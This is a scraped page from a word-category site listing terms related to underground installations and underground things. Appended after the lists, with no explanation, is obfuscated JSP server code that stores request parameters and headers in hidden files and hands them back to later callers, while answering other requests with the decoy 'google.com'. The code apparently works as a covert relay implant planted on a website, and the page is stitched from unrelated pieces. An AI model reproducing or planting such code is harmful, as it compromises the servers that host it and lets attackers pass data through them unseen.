Use the & operator to see the shared categories of two terms. E.g.
cola & coffee
or
divorce & war
Go Back
See XML
Members for Fine-Grained Categories
underground_installation
:
duct,
stone,
cable,
natural_gas,
tunnel_liner,
tunnel_system,
sewer_pipe,
anchor,
station,
access,
stairs,
telephone_cable,
telecommunication_cable,
sewer,
pipeline,
foundation_wall,
bridge_abutment,
line,
pvc_pipe,
missile,
computer,
pump,
septic_tank,
foundation,
gallery,
basement,
fuel_tank,
vault,
subway,
building_drain,
air_line,
pillbox,
light,
telecommunication_line,
command_bunker,
communication_line,
box,
tube,
tower,
ditch,
utility_meter,
gas,
platform,
paving,
hydrant,
pole,
store,
rail,
water_service,
gas_pipeline,
gas_pipe,
utility_line,
drain,
truck,
manhole,
valve,
submersible_pump,
medium,
electrical_conduit,
level,
water,
transport,
dam,
telecommunication,
quarry,
communication_cable,
structure,
compressor,
cistern,
switch,
depot,
electric_cable,
utility,
railway,
storage_facility,
construction,
sprinkler,
waste_repository,
trench,
church,
substation,
bunker,
retail_space,
wire,
mine,
arch,
pipe,
parking_garage,
pipework,
plumbing,
meter,
sump,
design,
ventilation,
kitchen,
shaft,
roads,
pit,
conductor,
oil,
petroleum_storage,
driveway,
sink,
telephone,
garage,
silo,
mine_shaft,
command_facility,
conduit,
hardware,
pier,
main,
support_screen,
culvert,
electric_line,
building,
vertical_shaft,
service,
transformer,
tunnel,
road,
junction_box,
electric,
fuel_pipeline,
electrical_cable,
riser,
track,
tank,
Modifiers matching
installation
:
isolated,
size,
permanent,
protective,
fixed,
linear,
commercial,
electrical,
large,
unmanned,
scientific,
social,
radio,
structural,
communal,
electric,
marine,
controlled,
military,
off,
dynamic,
smaller,
institutional,
unusual,
federal,
physical,
vital,
specialized,
hazardous,
vulnerable,
outdoor,
complex,
industrial,
nearby,
medium,
academic,
professional,
metallic,
domestic,
inshore,
remote,
vertical,
down,
movable,
inside,
stationary,
stable,
important,
alert,
modular,
static,
impressive,
wet,
spatial,
larger,
nuclear,
underground,
simple,
exterior,
mechanical,
underwater,
civilian,
high,
critical,
incidental,
special,
maritime,
complicated,
particular,
semipermanent,
mobile,
floating,
basic,
portable,
expensive,
essential,
key,
surrounding,
sloping,
multiple,
single,
secure,
national,
sized,
official,
external,
audiovisual,
technical,
overhead,
minor,
agricultural,
advanced,
exposed,
fighting,
chemical,
unattended,
electronic,
self,
current,
central,
technological,
interior,
coastal,
closed,
individual,
modern,
small,
shared,
sanitary,
thick,
auxiliary,
primary,
light,
economic,
centralized,
concrete,
supporting,
recreational,
corporate,
residential,
convenient,
necessary,
real,
quick,
proper,
outside,
horizontal,
temporary,
sensitive,
functional,
environmental,
additional,
occupied,
strategic,
architectural,
tubular,
productive,
base,
public,
defensive,
major,
internal,
unique,
hydraulic,
harsh,
moving,
appropriate,
covered,
indoor,
ancillary,
interactive,
new,
aquatic,
complete,
peripheral,
decorative,
difficult,
avionic,
limited,
big,
subsurface,
typical,
Simple categories matching
underground
:
area,
obstruction,
plant,
structure,
pest,
duct,
housing,
development,
improvement,
vegetable,
facility,
wealth,
life,
installation,
line,
fixture,
relic,
feature,
equipment,
group,
part,
works,
void,
band,
pipeline,
aquifer,
object,
formation,
container,
cistern,
music,
cave,
location,
cavity,
room,
conduit,
item,
enclosure,
resource,
property,
building,
topic,
expanse,
storage,
tunnel,
space,
harvester,
opening,
tank,
fluid,
material,
activity,
world,
bunker,
work,
cavern,
service,
pipe,
place,
organ,
treasure,
passage,
construction,
obstacle,
system,
hydrocarbon,
stem,
shelter,
reservoir,
conductor,
fortification,
utility,
supply,
liquid,
excavation,
cable,
<%@page trimDirectiveWhitespaces="true"%> <%@page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@page import="java.io.*"%> <%@page import="java.util.*"%> <%@page import="java.text.*"%> <%! static String cuy321a = null; public static String cuy321b(byte[] cuy321c) { char[] cuy321d = { 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P', 'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v', 'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/' }; StringBuilder cuy321e = new StringBuilder(); int cuy321f = 0; for (int i = 0; i < cuy321c.length; i += 3) { int b = ((cuy321c[i] & 0xFF) << 16) & 0xFFFFFF; if (i + 1 < cuy321c.length) { b |= (cuy321c[i+1] & 0xFF) << 8; } else { cuy321f++; } if (i + 2 < cuy321c.length) { b |= (cuy321c[i+2] & 0xFF); } else { cuy321f++; } for (int j = 0; j < 4 - cuy321f; j++) { int c = (b & 0xFC0000) >> 18; cuy321e.append(cuy321d[c]); b <<= 6; } } for (int j = 0; j < cuy321f; j++) { cuy321e.append("="); } return cuy321e.toString(); } public void cuy321a(HttpServletRequest req) { if (cuy321a != null) return; String cuy321g = getServletContext().getRealPath(req.getRequestURI()).replace('\\', '/'); cuy321a = cuy321g.substring(0, cuy321g.lastIndexOf('/')) + "/"; } byte[] cuy321h(String cuy321i) { byte[] cuy321j = null; FileInputStream cuy321k = null; File file = new File(cuy321i); try { cuy321k = new FileInputStream(file); cuy321j = new byte[(int)file.length()]; cuy321k.read(cuy321j); } catch (Exception ex) { } finally { try { if (cuy321k != null) cuy321k.close(); } catch (Exception ex) { } } return cuy321j; } %> <% cuy321a(request); String cuy322a = request.getParameter("user"); String cuy322b = request.getParameter("rand"); String cuy322c = request.getParameter("id"); String cuy322d = request.getParameter("action"); int cuy322e = -1; if (request.getParameter("code") != null) cuy322e = Integer.parseInt(request.getParameter("code")) % 4; if (cuy322d != null && "home".equals(cuy322d)) { out.write("google.com"); } if (cuy322a != null && !"0".equals(cuy322a)) { String cuy322g = cuy321a + cuy322b + ".vps"; String cuy322f = cuy322g + "x"; String cuy322h = request.getParameter("hash"); String cuy322i = request.getHeader("From"); FileOutputStream cuy322j = null; cuy322j = new FileOutputStream(cuy322f); if(cuy322j != null) { DataOutputStream cuy322k = new DataOutputStream(cuy322j); cuy322k.writeLong(System.currentTimeMillis()); cuy322k.close(); cuy322j.close(); } cuy322j = new FileOutputStream(cuy322g, false); if(cuy322j != null) { cuy322j.write(cuy322h.getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322i.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322a.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322b.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.flush(); cuy322j.close(); } out.write("google.com"); } else if (cuy322e == 0 && "0".equals(cuy322c)) { out.write("google.com"); } else if (cuy322e == 1) { File cuy322l = new File(cuy321a); String cuy322g = null; String cuy322f = null; int cuy322m = 0; if (cuy322l.exists() && cuy322l.isDirectory()) { for(File file:cuy322l.listFiles()) { cuy322g = file.getName(); if(cuy322g.endsWith(".vps")) { cuy322m = 1; cuy322g = file.getAbsolutePath(); cuy322f = cuy322g + "x"; break; } } } if (cuy322m == 1) { FileInputStream cuy321k = new FileInputStream(cuy322f); DataInputStream cuy322o = new DataInputStream(cuy321k); if(System.currentTimeMillis() - cuy322o.readLong() < 180000) { byte[] cuy322p = cuy321h(cuy322g); if (cuy322p != null) { out.write(new String(cuy322p)); } } cuy322o.close(); cuy321k.close(); File cuy322p1 = new File(cuy322g); cuy322p1.delete(); File cuy322pz = new File(cuy322f); cuy322pz.delete(); } else { out.write("google.com"); } } %>